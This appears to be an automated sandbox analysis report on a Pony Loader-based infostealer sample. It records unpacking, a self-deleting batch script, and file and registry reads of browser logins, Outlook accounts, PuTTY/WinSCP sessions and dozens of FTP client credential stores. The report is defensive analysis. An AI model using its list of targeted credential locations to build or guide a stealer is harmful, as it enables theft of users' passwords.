Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Detected unpacking (changes PE section rights)

Data Obfuscation

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Unpacked PE file: 1.2.BW38j8Jkbl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,

1_2_00410065

Source: BW38j8Jkbl.exe

Static PE information: real checksum: 0xa2107 should be: 0xa18ac

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 0_2_00402D58 push cs; retf

0_2_00402D72

Hooking and other Techniques for Hiding and Protection

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

File dump: 6000093.bat.1.dr 3880EEB1C736D853EB13B44898B718AB

Jump to dropped file

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_004051E3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_004041A6
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404E73
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408AE5
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00409832
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408961

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r[

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node	graph_1-9253
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node	graph_1-9648
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	API call chain: ExitProcess graph end node	graph_1-9110

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

1_2_00410065

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C0974 mov eax, dword ptr fs:[00000030h]	0_2_022C0974
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C02B3 mov ebx, dword ptr fs:[00000030h]	0_2_022C02B3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 0_2_022C09DD mov eax, dword ptr fs:[00000030h]	0_2_022C09DD
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: 1_2_0040F990 mov eax, dword ptr fs:[00000030h]	1_2_0040F990

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,

1_2_004105D6

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,746B1B10,ImpersonateLoggedOnUser,RevertToSelf,746A5030,CloseHandle,

1_2_0041032D

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"			Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "			Jump to behavior

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_004044D2

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_0041051E OleInitialize,GetUserNameA,

1_2_0041051E

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Code function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004045FD

Stealing of Sensitive Information

Yara detected Generic Dropper

Source: Yara match

File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SiteDesigner\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\Setup	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
